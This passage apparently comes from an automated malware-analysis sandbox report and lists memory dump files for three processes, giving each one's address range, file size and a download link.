Filesize
180KB

Download
memory/3272-206-0x00007FFE3CB50000-0x00007FFE3CB69000-memory.dmp

Filesize
100KB

Download
memory/3272-207-0x00007FFE38960000-0x00007FFE38983000-memory.dmp

Filesize
140KB

Download
memory/3272-210-0x00007FFE40560000-0x00007FFE4056D000-memory.dmp

Filesize
52KB

Download
memory/3272-267-0x00007FFE27270000-0x00007FFE2738C000-memory.dmp

Filesize
1.1MB

Download
memory/3272-209-0x00007FFE3CB30000-0x00007FFE3CB49000-memory.dmp

Filesize
100KB

Download
memory/3272-216-0x00007FFE27710000-0x00007FFE277C8000-memory.dmp

Filesize
736KB

Download
memory/3272-211-0x00007FFE33770000-0x00007FFE3379E000-memory.dmp

Filesize
184KB

Download
memory/3272-226-0x00007FFE29100000-0x00007FFE296E8000-memory.dmp

Filesize
5.9MB

Download
memory/3272-208-0x00007FFE277D0000-0x00007FFE27943000-memory.dmp

Filesize
1.4MB

Download
memory/3272-222-0x00007FFE3C5B0000-0x00007FFE3C5C4000-memory.dmp

Filesize
80KB

Download
memory/3272-251-0x00007FFE29100000-0x00007FFE296E8000-memory.dmp

Filesize
5.9MB

Download
memory/3272-218-0x00007FFE3D3A0000-0x00007FFE3D3AD000-memory.dmp

Filesize
52KB

Download
memory/3272-254-0x00007FFE3CB70000-0x00007FFE3CB9D000-memory.dmp

Filesize
180KB

Download
memory/3272-257-0x00007FFE277D0000-0x00007FFE27943000-memory.dmp

Filesize
1.4MB

Download
memory/3272-258-0x00007FFE3CB30000-0x00007FFE3CB49000-memory.dmp

Filesize
100KB

Download
memory/3272-213-0x0000018C69CD0000-0x0000018C6A045000-memory.dmp

Filesize
3.5MB

Download
memory/3272-256-0x00007FFE38960000-0x00007FFE38983000-memory.dmp

Filesize
140KB

Download
memory/3272-255-0x00007FFE3CB50000-0x00007FFE3CB69000-memory.dmp

Filesize
100KB

Download
memory/3272-252-0x00007FFE40450000-0x00007FFE40474000-memory.dmp

Filesize
144KB

Download
memory/3272-260-0x00007FFE33770000-0x00007FFE3379E000-memory.dmp

Filesize
184KB

Download
memory/3272-261-0x00007FFE27710000-0x00007FFE277C8000-memory.dmp

Filesize
736KB

Download
memory/3272-262-0x00007FFE27390000-0x00007FFE27705000-memory.dmp

Filesize
3.5MB

Download
memory/3272-264-0x00007FFE3D3A0000-0x00007FFE3D3AD000-memory.dmp

Filesize
52KB

Download
memory/3272-263-0x00007FFE3C5B0000-0x00007FFE3C5C4000-memory.dmp

Filesize
80KB

Download
memory/3272-265-0x00007FFE40450000-0x00007FFE40474000-memory.dmp

Filesize
144KB

Download
memory/3272-219-0x00007FFE27270000-0x00007FFE2738C000-memory.dmp

Filesize
1.1MB

Download
memory/3272-217-0x00007FFE27390000-0x00007FFE27705000-memory.dmp

Filesize
3.5MB

Download
memory/4180-126-0x00007FFE2CF00000-0x00007FFE2D9C1000-memory.dmp

Filesize
10.8MB

Download
memory/4180-224-0x00007FFE2CF00000-0x00007FFE2D9C1000-memory.dmp

Filesize
10.8MB

Download
memory/4180-129-0x0000000001450000-0x0000000001460000-memory.dmp

Filesize
64KB

Download
memory/4180-30-0x00000000009D0000-0x0000000000A8E000-memory.dmp

Filesize
760KB

Download
memory/4520-227-0x00007FFE2CF00000-0x00007FFE2D9C1000-memory.dmp

Filesize
10.8MB

Download
memory/4520-229-0x000002746FA40000-0x000002746FA50000-memory.dmp

Filesize
64KB

Download
memory/4520-228-0x000002746FA40000-0x000002746FA50000-memory.dmp

Filesize
64KB

Download
memory/4520-285-0x00007FFE2CF00000-0x00007FFE2D9C1000-memory.dmp

Filesize
10.8MB

Download
memory/4520-230-0x000002746FA50000-0x000002746FA72000-memory.dmp

Filesize
136KB

Download